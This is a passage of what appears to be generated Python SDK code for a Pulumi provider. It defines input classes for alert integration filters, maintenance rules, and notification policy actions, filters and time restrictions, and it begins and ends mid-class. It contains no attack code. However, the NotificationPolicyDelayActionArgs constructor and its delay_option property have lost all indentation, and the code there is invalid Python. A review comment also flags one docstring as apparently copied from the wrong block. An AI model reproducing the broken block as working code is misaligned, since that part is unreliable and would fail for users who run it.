        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterConditionArgs']]]]):
        pulumi.set(self, "conditions", value)
@pulumi.input_type
class IntegrationActionIgnoreFilterConditionArgs:
    def __init__(__self__, *,
                 field: pulumi.Input[str],
                 operation: pulumi.Input[str],
                 expected_value: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 not_: Optional[pulumi.Input[bool]] = None,
                 order: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
        """
        pulumi.set(__self__, "field", field)
        pulumi.set(__self__, "operation", operation)
        # Optional attributes are stored only when explicitly supplied.
        for attr_name, attr_value in (
            ("expected_value", expected_value),
            ("key", key),
            ("not_", not_),
            ("order", order),
        ):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def field(self) -> pulumi.Input[str]:
        return pulumi.get(self, "field")

    @field.setter
    def field(self, value: pulumi.Input[str]):
        pulumi.set(self, "field", value)

    @property
    @pulumi.getter
    def operation(self) -> pulumi.Input[str]:
        return pulumi.get(self, "operation")

    @operation.setter
    def operation(self, value: pulumi.Input[str]):
        pulumi.set(self, "operation", value)

    @property
    @pulumi.getter(name="expectedValue")
    def expected_value(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "expected_value")

    @expected_value.setter
    def expected_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_value", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter(name="not")
    def not_(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "not_")

    @not_.setter
    def not_(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "not_", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """Integer value that defines in which order the action will be performed. Default: `1`."""
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)
@pulumi.input_type
class MaintenanceRuleArgs:
    def __init__(__self__, *,
                 entities: pulumi.Input[Sequence[pulumi.Input['MaintenanceRuleEntityArgs']]],
                 state: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[Sequence[pulumi.Input['MaintenanceRuleEntityArgs']]] entities: This field represents the entity that maintenance will be applied. Entity field takes two mandatory fields as id and type.
        :param pulumi.Input[str] state: State of rule that will be defined in maintenance and can take either enabled or disabled for policy type rules. This field has to be disabled for integration type entity rules.
        """
        pulumi.set(__self__, "entities", entities)
        if state is None:
            return
        pulumi.set(__self__, "state", state)

    @property
    @pulumi.getter
    def entities(self) -> pulumi.Input[Sequence[pulumi.Input['MaintenanceRuleEntityArgs']]]:
        """This field represents the entity that maintenance will be applied. Entity field takes two mandatory fields as id and type."""
        return pulumi.get(self, "entities")

    @entities.setter
    def entities(self, value: pulumi.Input[Sequence[pulumi.Input['MaintenanceRuleEntityArgs']]]):
        pulumi.set(self, "entities", value)

    @property
    @pulumi.getter
    def state(self) -> Optional[pulumi.Input[str]]:
        """State of rule that will be defined in maintenance and can take either enabled or disabled for policy type rules. This field has to be disabled for integration type entity rules."""
        return pulumi.get(self, "state")

    @state.setter
    def state(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "state", value)
@pulumi.input_type
class MaintenanceRuleEntityArgs:
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] id: The id of the entity that maintenance will be applied.
        :param pulumi.Input[str] type: This parameter defines when the maintenance will be active. It can take one of for-5-minutes, for-30-minutes, for-1-hour, indefinitely or schedule.
        """
        # Both attributes are optional; store only those explicitly supplied.
        for attr_name, attr_value in (("id", id), ("type", type)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """The id of the entity that maintenance will be applied."""
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """This parameter defines when the maintenance will be active. It can take one of for-5-minutes, for-30-minutes, for-1-hour, indefinitely or schedule."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class MaintenanceTimeArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 end_date: Optional[pulumi.Input[str]] = None,
                 start_date: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] type: This parameter defines when the maintenance will be active. It can take one of for-5-minutes, for-30-minutes, for-1-hour, indefinitely or schedule.
        :param pulumi.Input[str] end_date: This parameter takes a date format as (yyyy-MM-dd'T'HH:mm:ssZ) (e.g. 2019-06-11T08:00:00+02:00).
        :param pulumi.Input[str] start_date: This parameter takes a date format as (yyyy-MM-dd'T'HH:mm:ssZ) (e.g. 2019-06-11T08:00:00+02:00).
        """
        pulumi.set(__self__, "type", type)
        # Optional attributes are stored only when explicitly supplied.
        for attr_name, attr_value in (("end_date", end_date), ("start_date", start_date)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """This parameter defines when the maintenance will be active. It can take one of for-5-minutes, for-30-minutes, for-1-hour, indefinitely or schedule."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter(name="endDate")
    def end_date(self) -> Optional[pulumi.Input[str]]:
        """This parameter takes a date format as (yyyy-MM-dd'T'HH:mm:ssZ) (e.g. 2019-06-11T08:00:00+02:00)."""
        return pulumi.get(self, "end_date")

    @end_date.setter
    def end_date(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "end_date", value)

    @property
    @pulumi.getter(name="startDate")
    def start_date(self) -> Optional[pulumi.Input[str]]:
        """This parameter takes a date format as (yyyy-MM-dd'T'HH:mm:ssZ) (e.g. 2019-06-11T08:00:00+02:00)."""
        return pulumi.get(self, "start_date")

    @start_date.setter
    def start_date(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "start_date", value)
@pulumi.input_type
class NotificationPolicyAutoCloseActionArgs:
    def __init__(__self__, *,
                 durations: pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoCloseActionDurationArgs']]]):
        """
        :param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoCloseActionDurationArgs']]] durations: Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
        """
        # `durations` is the only (mandatory) attribute of this action.
        pulumi.set(__self__, "durations", durations)

    @property
    @pulumi.getter
    def durations(self) -> pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoCloseActionDurationArgs']]]:
        """Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below."""
        return pulumi.get(self, "durations")

    @durations.setter
    def durations(self, value: pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoCloseActionDurationArgs']]]):
        pulumi.set(self, "durations", value)
@pulumi.input_type
class NotificationPolicyAutoCloseActionDurationArgs:
    def __init__(__self__, *,
                 time_amount: pulumi.Input[int],
                 time_unit: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[int] time_amount: A amount of time in `time_units`. This is a integer attribute.
        :param pulumi.Input[str] time_unit: Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
        """
        pulumi.set(__self__, "time_amount", time_amount)
        if time_unit is None:
            return
        pulumi.set(__self__, "time_unit", time_unit)

    @property
    @pulumi.getter(name="timeAmount")
    def time_amount(self) -> pulumi.Input[int]:
        """A amount of time in `time_units`. This is a integer attribute."""
        return pulumi.get(self, "time_amount")

    @time_amount.setter
    def time_amount(self, value: pulumi.Input[int]):
        pulumi.set(self, "time_amount", value)

    @property
    @pulumi.getter(name="timeUnit")
    def time_unit(self) -> Optional[pulumi.Input[str]]:
        """Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`"""
        return pulumi.get(self, "time_unit")

    @time_unit.setter
    def time_unit(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_unit", value)
@pulumi.input_type
class NotificationPolicyAutoRestartActionArgs:
    def __init__(__self__, *,
                 durations: pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoRestartActionDurationArgs']]],
                 max_repeat_count: pulumi.Input[int]):
        """
        :param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoRestartActionDurationArgs']]] durations: Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
        :param pulumi.Input[int] max_repeat_count: How many times to repeat. This is a integer attribute.
        """
        # Both attributes are mandatory, so they are stored unconditionally.
        pulumi.set(__self__, "durations", durations)
        pulumi.set(__self__, "max_repeat_count", max_repeat_count)

    @property
    @pulumi.getter
    def durations(self) -> pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoRestartActionDurationArgs']]]:
        """Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below."""
        return pulumi.get(self, "durations")

    @durations.setter
    def durations(self, value: pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoRestartActionDurationArgs']]]):
        pulumi.set(self, "durations", value)

    @property
    @pulumi.getter(name="maxRepeatCount")
    def max_repeat_count(self) -> pulumi.Input[int]:
        """How many times to repeat. This is a integer attribute."""
        return pulumi.get(self, "max_repeat_count")

    @max_repeat_count.setter
    def max_repeat_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "max_repeat_count", value)
@pulumi.input_type
class NotificationPolicyAutoRestartActionDurationArgs:
    def __init__(__self__, *,
                 time_amount: pulumi.Input[int],
                 time_unit: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[int] time_amount: A amount of time in `time_units`. This is a integer attribute.
        :param pulumi.Input[str] time_unit: Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
        """
        pulumi.set(__self__, "time_amount", time_amount)
        if time_unit is None:
            return
        pulumi.set(__self__, "time_unit", time_unit)

    @property
    @pulumi.getter(name="timeAmount")
    def time_amount(self) -> pulumi.Input[int]:
        """A amount of time in `time_units`. This is a integer attribute."""
        return pulumi.get(self, "time_amount")

    @time_amount.setter
    def time_amount(self, value: pulumi.Input[int]):
        pulumi.set(self, "time_amount", value)

    @property
    @pulumi.getter(name="timeUnit")
    def time_unit(self) -> Optional[pulumi.Input[str]]:
        """Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`"""
        return pulumi.get(self, "time_unit")

    @time_unit.setter
    def time_unit(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_unit", value)
@pulumi.input_type
class NotificationPolicyDeDuplicationActionArgs:
    def __init__(__self__, *,
                 count: pulumi.Input[int],
                 de_duplication_action_type: pulumi.Input[str],
                 durations: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDeDuplicationActionDurationArgs']]]] = None):
        """
        :param pulumi.Input[int] count: - Count
        :param pulumi.Input[str] de_duplication_action_type: Deduplication type. Possible values are: "value-based", "frequency-based"
        :param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDeDuplicationActionDurationArgs']]] durations: Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
        """
        pulumi.set(__self__, "count", count)
        pulumi.set(__self__, "de_duplication_action_type", de_duplication_action_type)
        if durations is None:
            return
        pulumi.set(__self__, "durations", durations)

    @property
    @pulumi.getter
    def count(self) -> pulumi.Input[int]:
        """- Count"""
        return pulumi.get(self, "count")

    @count.setter
    def count(self, value: pulumi.Input[int]):
        pulumi.set(self, "count", value)

    @property
    @pulumi.getter(name="deDuplicationActionType")
    def de_duplication_action_type(self) -> pulumi.Input[str]:
        """Deduplication type. Possible values are: "value-based", "frequency-based" """
        return pulumi.get(self, "de_duplication_action_type")

    @de_duplication_action_type.setter
    def de_duplication_action_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "de_duplication_action_type", value)

    @property
    @pulumi.getter
    def durations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDeDuplicationActionDurationArgs']]]]:
        """Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below."""
        return pulumi.get(self, "durations")

    @durations.setter
    def durations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDeDuplicationActionDurationArgs']]]]):
        pulumi.set(self, "durations", value)
@pulumi.input_type
class NotificationPolicyDeDuplicationActionDurationArgs:
    def __init__(__self__, *,
                 time_amount: pulumi.Input[int],
                 time_unit: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[int] time_amount: A amount of time in `time_units`. This is a integer attribute.
        :param pulumi.Input[str] time_unit: Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
        """
        pulumi.set(__self__, "time_amount", time_amount)
        if time_unit is None:
            return
        pulumi.set(__self__, "time_unit", time_unit)

    @property
    @pulumi.getter(name="timeAmount")
    def time_amount(self) -> pulumi.Input[int]:
        """A amount of time in `time_units`. This is a integer attribute."""
        return pulumi.get(self, "time_amount")

    @time_amount.setter
    def time_amount(self, value: pulumi.Input[int]):
        pulumi.set(self, "time_amount", value)

    @property
    @pulumi.getter(name="timeUnit")
    def time_unit(self) -> Optional[pulumi.Input[str]]:
        """Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`"""
        return pulumi.get(self, "time_unit")

    @time_unit.setter
    def time_unit(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_unit", value)
@pulumi.input_type
class NotificationPolicyDelayActionArgs:
def __init__(__self__, *,
delay_option: pulumi.Input[str],
durations: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDelayActionDurationArgs']]]] = None,
until_hour: Optional[pulumi.Input[int]] = None,
until_minute: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] delay_option: Defines until what day to delay or for what duration. Possible values are: `for-duration`, `next-time`, `next-weekday`, `next-monday`, `next-tuesday`, `next-wednesday`, `next-thursday`, `next-friday`, `next-saturday`, `next-sunday`
:param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDelayActionDurationArgs']]] durations: Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
:param pulumi.Input[int] until_hour: Until what hour notifications will be delayed. If `delay_option` is set to antyhing else then `for-duration` this has to be set.
:param pulumi.Input[int] until_minute: Until what minute on `until_hour` notifications will be delayed. If `delay_option` is set to antyhing else then `for-duration` this has to be set.
"""
pulumi.set(__self__, "delay_option", delay_option)
if durations is not None:
pulumi.set(__self__, "durations", durations)
if until_hour is not None:
pulumi.set(__self__, "until_hour", until_hour)
if until_minute is not None:
pulumi.set(__self__, "until_minute", until_minute)
@property
@pulumi.getter(name="delayOption")
def delay_option(self) -> pulumi.Input[str]:
"""
Defines until what day to delay or for what duration. Possible values are: `for-duration`, `next-time`, `next-weekday`, `next-monday`, `next-tuesday`, `next-wednesday`, `next-thursday`, `next-friday`, `next-saturday`, `next-sunday`
"""
return pulumi.get(self, "delay_option")
@delay_option.setter
def delay_option(self, value: pulumi.Input[str]):
pulumi.set(self, "delay_option", value)
    @property
    @pulumi.getter
    def durations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDelayActionDurationArgs']]]]:
        """
        Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
        """
        return pulumi.get(self, "durations")

    @durations.setter
    def durations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDelayActionDurationArgs']]]]):
        pulumi.set(self, "durations", value)
    @property
    @pulumi.getter(name="untilHour")
    def until_hour(self) -> Optional[pulumi.Input[int]]:
        """
        Until what hour notifications will be delayed. If `delay_option` is set to anything other than `for-duration` this has to be set.
        """
        return pulumi.get(self, "until_hour")

    @until_hour.setter
    def until_hour(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "until_hour", value)
    @property
    @pulumi.getter(name="untilMinute")
    def until_minute(self) -> Optional[pulumi.Input[int]]:
        """
        Until what minute on `until_hour` notifications will be delayed. If `delay_option` is set to anything other than `for-duration` this has to be set.
        """
        return pulumi.get(self, "until_minute")

    @until_minute.setter
    def until_minute(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "until_minute", value)
@pulumi.input_type
class NotificationPolicyDelayActionDurationArgs:
    def __init__(__self__, *,
                 time_amount: pulumi.Input[int],
                 time_unit: Optional[pulumi.Input[str]] = None):
        """
        A single duration entry for a delay action.

        :param pulumi.Input[int] time_amount: An amount of time in `time_unit` units. This is an integer attribute.
        :param pulumi.Input[str] time_unit: Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
        """
        pulumi.set(__self__, "time_amount", time_amount)
        if time_unit is not None:
            pulumi.set(__self__, "time_unit", time_unit)

    @property
    @pulumi.getter(name="timeAmount")
    def time_amount(self) -> pulumi.Input[int]:
        """
        An amount of time in `time_unit` units. This is an integer attribute.
        """
        return pulumi.get(self, "time_amount")

    @time_amount.setter
    def time_amount(self, value: pulumi.Input[int]):
        pulumi.set(self, "time_amount", value)

    @property
    @pulumi.getter(name="timeUnit")
    def time_unit(self) -> Optional[pulumi.Input[str]]:
        """
        Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
        """
        return pulumi.get(self, "time_unit")

    @time_unit.setter
    def time_unit(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_unit", value)
@pulumi.input_type
class NotificationPolicyFilterArgs:
    def __init__(__self__, *,
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyFilterConditionArgs']]]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyFilterConditionArgs']]] conditions: Conditions applied to filter. This is a block, structure is documented below.
        :param pulumi.Input[str] type: Defines if restriction should apply daily on given hours or on certain days and hours. Possible values are: `time-of-day`, `weekday-and-time-of-day`
            NOTE(review): this generated description appears copied from the time-restriction block; filter `type` values elsewhere in this file are `match-all`, `match-any-condition`, `match-all-conditions` — confirm against the provider schema.
        """
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)
        if type is not None:
            pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyFilterConditionArgs']]]]:
        """
        Conditions applied to filter. This is a block, structure is documented below.
        """
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyFilterConditionArgs']]]]):
        pulumi.set(self, "conditions", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        Defines if restriction should apply daily on given hours or on certain days and hours. Possible values are: `time-of-day`, `weekday-and-time-of-day`
        NOTE(review): description looks copy-pasted from the time-restriction block — verify against the provider schema.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class NotificationPolicyFilterConditionArgs:
    def __init__(__self__, *,
                 field: pulumi.Input[str],
                 operation: pulumi.Input[str],
                 expected_value: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 not_: Optional[pulumi.Input[bool]] = None,
                 order: Optional[pulumi.Input[int]] = None):
        """
        A single condition of a notification-policy filter.

        :param pulumi.Input[str] field: Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
        :param pulumi.Input[str] operation: It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
        :param pulumi.Input[str] expected_value: User defined value that will be compared with alert field according to the operation. Default: empty string
        :param pulumi.Input[str] key: If `field` is set as extra-properties, key could be used for key-value pair
        :param pulumi.Input[bool] not_: Indicates behaviour of the given operation. Default: `false`
        :param pulumi.Input[int] order: Order of the condition in conditions list
        """
        pulumi.set(__self__, "field", field)
        pulumi.set(__self__, "operation", operation)
        if expected_value is not None:
            pulumi.set(__self__, "expected_value", expected_value)
        if key is not None:
            pulumi.set(__self__, "key", key)
        if not_ is not None:
            pulumi.set(__self__, "not_", not_)
        if order is not None:
            pulumi.set(__self__, "order", order)

    @property
    @pulumi.getter
    def field(self) -> pulumi.Input[str]:
        """
        Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
        """
        return pulumi.get(self, "field")

    @field.setter
    def field(self, value: pulumi.Input[str]):
        pulumi.set(self, "field", value)

    @property
    @pulumi.getter
    def operation(self) -> pulumi.Input[str]:
        """
        It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
        """
        return pulumi.get(self, "operation")

    @operation.setter
    def operation(self, value: pulumi.Input[str]):
        pulumi.set(self, "operation", value)

    @property
    @pulumi.getter(name="expectedValue")
    def expected_value(self) -> Optional[pulumi.Input[str]]:
        """
        User defined value that will be compared with alert field according to the operation. Default: empty string
        """
        return pulumi.get(self, "expected_value")

    @expected_value.setter
    def expected_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_value", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        """
        If `field` is set as extra-properties, key could be used for key-value pair
        """
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    # "not" is a Python keyword, hence the trailing underscore; the wire
    # name is "not" (see the getter's name= override below).
    @property
    @pulumi.getter(name="not")
    def not_(self) -> Optional[pulumi.Input[bool]]:
        """
        Indicates behaviour of the given operation. Default: `false`
        """
        return pulumi.get(self, "not_")

    @not_.setter
    def not_(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "not_", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """
        Order of the condition in conditions list
        """
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)
@pulumi.input_type
class NotificationPolicyTimeRestrictionArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 restrictions: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyTimeRestrictionRestrictionArgs']]]] = None):
        """
        :param pulumi.Input[str] type: Defines if restriction should apply daily on given hours or on certain days and hours. Possible values are: `time-of-day`, `weekday-and-time-of-day`
        :param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyTimeRestrictionRestrictionArgs']]] restrictions: List of days and hours definitions for field type = `weekday-and-time-of-day`. This is a block, structure is documented below.
        """
        pulumi.set(__self__, "type", type)
        if restrictions is not None:
            pulumi.set(__self__, "restrictions", restrictions)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Defines if restriction should apply daily on given hours or on certain days and hours. Possible values are: `time-of-day`, `weekday-and-time-of-day`
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def restrictions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyTimeRestrictionRestrictionArgs']]]]:
        """
        List of days and hours definitions for field type = `weekday-and-time-of-day`. This is a block, structure is documented below.
        """
        return pulumi.get(self, "restrictions")

    @restrictions.setter
    def restrictions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyTimeRestrictionRestrictionArgs']]]]):
        pulumi.set(self, "restrictions", value)
@pulumi.input_type
class NotificationPolicyTimeRestrictionRestrictionArgs:
    def __init__(__self__, *,
                 end_day: pulumi.Input[str],
                 end_hour: pulumi.Input[int],
                 end_min: pulumi.Input[int],
                 start_day: pulumi.Input[str],
                 start_hour: pulumi.Input[int],
                 start_min: pulumi.Input[int]):
        """
        A single weekday-and-time-of-day restriction window.

        :param pulumi.Input[str] end_day: Ending day of restriction (eg. `wednesday`)
        :param pulumi.Input[int] end_hour: Ending hour of restriction.
        :param pulumi.Input[int] end_min: Ending minute of restriction on defined `end_hour`
        :param pulumi.Input[str] start_day: Starting day of restriction (eg. `monday`)
        :param pulumi.Input[int] start_hour: Starting hour of restriction.
        :param pulumi.Input[int] start_min: Starting minute of restriction on defined `start_hour`
        """
        pulumi.set(__self__, "end_day", end_day)
        pulumi.set(__self__, "end_hour", end_hour)
        pulumi.set(__self__, "end_min", end_min)
        pulumi.set(__self__, "start_day", start_day)
        pulumi.set(__self__, "start_hour", start_hour)
        pulumi.set(__self__, "start_min", start_min)

    @property
    @pulumi.getter(name="endDay")
    def end_day(self) -> pulumi.Input[str]:
        """
        Ending day of restriction (eg. `wednesday`)
        """
        return pulumi.get(self, "end_day")

    @end_day.setter
    def end_day(self, value: pulumi.Input[str]):
        pulumi.set(self, "end_day", value)

    @property
    @pulumi.getter(name="endHour")
    def end_hour(self) -> pulumi.Input[int]:
        """
        Ending hour of restriction.
        """
        return pulumi.get(self, "end_hour")

    @end_hour.setter
    def end_hour(self, value: pulumi.Input[int]):
        pulumi.set(self, "end_hour", value)

    @property
    @pulumi.getter(name="endMin")
    def end_min(self) -> pulumi.Input[int]:
        """
        Ending minute of restriction on defined `end_hour`
        """
        return pulumi.get(self, "end_min")

    @end_min.setter
    def end_min(self, value: pulumi.Input[int]):
        pulumi.set(self, "end_min", value)

    @property
    @pulumi.getter(name="startDay")
    def start_day(self) -> pulumi.Input[str]:
        """
        Starting day of restriction (eg. `monday`)
        """
        return pulumi.get(self, "start_day")

    @start_day.setter
    def start_day(self, value: pulumi.Input[str]):
        pulumi.set(self, "start_day", value)

    @property
    @pulumi.getter(name="startHour")
    def start_hour(self) -> pulumi.Input[int]:
        """
        Starting hour of restriction.
        """
        return pulumi.get(self, "start_hour")

    @start_hour.setter
    def start_hour(self, value: pulumi.Input[int]):
        pulumi.set(self, "start_hour", value)

    @property
    @pulumi.getter(name="startMin")
    def start_min(self) -> pulumi.Input[int]:
        """
        Starting minute of restriction on defined `start_hour`
        """
        return pulumi.get(self, "start_min")

    @start_min.setter
    def start_min(self, value: pulumi.Input[int]):
        pulumi.set(self, "start_min", value)
@pulumi.input_type
class NotificationRuleCriteriaArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleCriteriaConditionArgs']]]] = None):
        """
        :param pulumi.Input[str] type: Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
        :param pulumi.Input[Sequence[pulumi.Input['NotificationRuleCriteriaConditionArgs']]] conditions: Defines the fields and values when the condition applies
        """
        pulumi.set(__self__, "type", type)
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleCriteriaConditionArgs']]]]:
        """
        Defines the fields and values when the condition applies
        """
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleCriteriaConditionArgs']]]]):
        pulumi.set(self, "conditions", value)
@pulumi.input_type
class NotificationRuleCriteriaConditionArgs:
    def __init__(__self__, *,
                 field: pulumi.Input[str],
                 operation: pulumi.Input[str],
                 expected_value: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 not_: Optional[pulumi.Input[bool]] = None,
                 order: Optional[pulumi.Input[int]] = None):
        """
        A single condition of a notification-rule criteria block.

        :param pulumi.Input[str] field: Possible values: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
        :param pulumi.Input[str] operation: Possible values: `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`
        :param pulumi.Input[str] expected_value: User defined value that will be compared with alert field according to the operation. Default: empty string
        :param pulumi.Input[str] key: If 'field' is set as 'extra-properties', key could be used for key-value pair
        :param pulumi.Input[bool] not_: Indicates behaviour of the given operation. Default: `false`
        :param pulumi.Input[int] order: Order of the condition in conditions list
        """
        pulumi.set(__self__, "field", field)
        pulumi.set(__self__, "operation", operation)
        if expected_value is not None:
            pulumi.set(__self__, "expected_value", expected_value)
        if key is not None:
            pulumi.set(__self__, "key", key)
        if not_ is not None:
            pulumi.set(__self__, "not_", not_)
        if order is not None:
            pulumi.set(__self__, "order", order)

    @property
    @pulumi.getter
    def field(self) -> pulumi.Input[str]:
        """
        Possible values: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
        """
        return pulumi.get(self, "field")

    @field.setter
    def field(self, value: pulumi.Input[str]):
        pulumi.set(self, "field", value)

    @property
